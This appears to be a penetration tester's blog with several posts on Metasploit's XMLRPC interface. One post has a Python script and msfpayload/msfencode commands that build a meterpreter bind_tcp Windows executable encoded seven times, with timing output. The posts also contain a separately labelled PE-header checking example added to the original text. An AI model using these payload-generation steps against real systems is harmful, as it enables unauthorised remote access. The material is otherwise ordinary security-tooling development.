Security Notes, News, and Thoughts

Slides and Code from Vegas

Thanks to all who came to see me present this week. I had a great time. I have gotten some good feedback from folks, and so I'm going to be updating a lot of code in the near future. Until then, I've put slides and code online for now. As I go through and clean up some stuff and release production versions I will be posting videos online. Until then, here are slides and code and if you have any questions feel free to email me or hit me up on twitter.




Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import sys
import xmlrpclib
import binascii

proxy = xmlrpclib.ServerProxy("http://localhost:55553")

# Log in to the XMLRPC server and keep the session token for later calls
ret = proxy.auth.login("msf", "abc123")
if ret['result'] == 'success':
    token = ret['token']
else:
    print "Could not login\n"
    sys.exit(1)

# Ask for an exe, run 7 times through whatever encoder Metasploit picks
opts = {
    "Format" : 'exe',
    "Iterations" : 7,
    "ForceEncode" : True}

ret = proxy.module.execute(token, "payload", "windows/meterpreter/bind_tcp", opts)
if ret['result'] == 'success':
    # The payload comes back hex-encoded; write the raw bytes to stdout
    # (sys.stdout.write rather than print, so no newline is appended to the exe)
    sys.stdout.write(binascii.unhexlify(ret['payload']))
else:
    print "Payload generation failed\n"

Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:

[email protected]:~/msfmods/py# time (python > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

It definitely appears we have a speed increase, and since the XMLRPC timing includes the overhead of an authentication call, it should be possible to take a little more time off of it. Being able to do this over XMLRPC hopefully will give folks an easy way to grab payloads remotely for common tasks.
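As an added example (not code from the original post or from the Metasploit project), here is a Python 3-compatible check that does what the `file` command above does, but on the hex string `module.execute` hands back in `ret['payload']`: it decodes the blob and reads the PE headers to confirm it really is a 32-bit i386 GUI executable before anything is written to disk. The sample bytes are a constructed minimal header, not a real payload.

```python
import binascii
import struct

# Constructed sample: only the headers a PE32 GUI image needs for this check
# (MZ stub, e_lfanew, "PE\0\0", COFF header, optional header). NOT a real
# Metasploit payload.
def build_sample_pe():
    dos = bytearray(b"MZ" + b"\x00" * 62)             # 64-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)  # i386, EXE|32BIT
    opt = bytearray(224)                              # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x010B)            # Magic: PE32
    struct.pack_into("<H", opt, 68, 2)                # Subsystem: WINDOWS_GUI
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

# Hex string in the shape module.execute returns it in ret['payload']
SAMPLE_HEX_RESPONSE = binascii.hexlify(build_sample_pe()).decode("ascii")

MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C0: "ARM"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000

def describe_pe(hex_payload):
    """Decode the hex payload and summarise its PE headers, like file(1) does."""
    data = binascii.unhexlify(hex_payload)
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                               # optional header follows 20-byte COFF header
    if opt_size < 70 or len(data) < opt + opt_size:
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # offset 68 in PE32 and PE32+
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "bits": {0x010B: "32-bit", 0x020B: "64-bit"}.get(magic, "unknown"),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "kind": "DLL" if chars & IMAGE_FILE_DLL else "executable",
    }

def file_style_line(hex_payload):
    d = describe_pe(hex_payload)
    return "MS-DOS %s PE for MS Windows (%s) %s %s" % (d["kind"], d["subsystem"], d["machine"], d["bits"])

if __name__ == "__main__":
    print(file_style_line(SAMPLE_HEX_RESPONSE))
```

Feed it `ret['payload']` straight from the XMLRPC response and compare the line it prints with what `file` reports on the msfencode output.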

Have thoughts or suggestions?

Hit me up at sussurro [aT] happypacket DOT net

Sharing data remotely through Metasploit

I've been working on some more XMLRPC stuff for Metasploit, and I wanted to share just a teaser of what is to come. I'm working on more integration between tools, but for now I have written a db module for Metasploit's XMLRPC engine which allows remote processes to get information from the database. Below is a quick demo in which a remote host, having run an nmap scan, uploads the results into Metasploit so they can be acted on there. This of course is just the tip of the iceberg: the API will allow automated reporting and data sharing across tools, so Metasploit can be used as the central knowledge repository where various tools across multiple testers' machines store their data.

I'm still waiting to hear back from Defcon and B-Sides Las Vegas, but if my talk gets accepted either place, you will get to see a whole lot more.

Sorry for the blurry video, I'll do better next time:

Video: "Sharing data between hosts with Metasploit" by Ryan Linn on Vimeo.
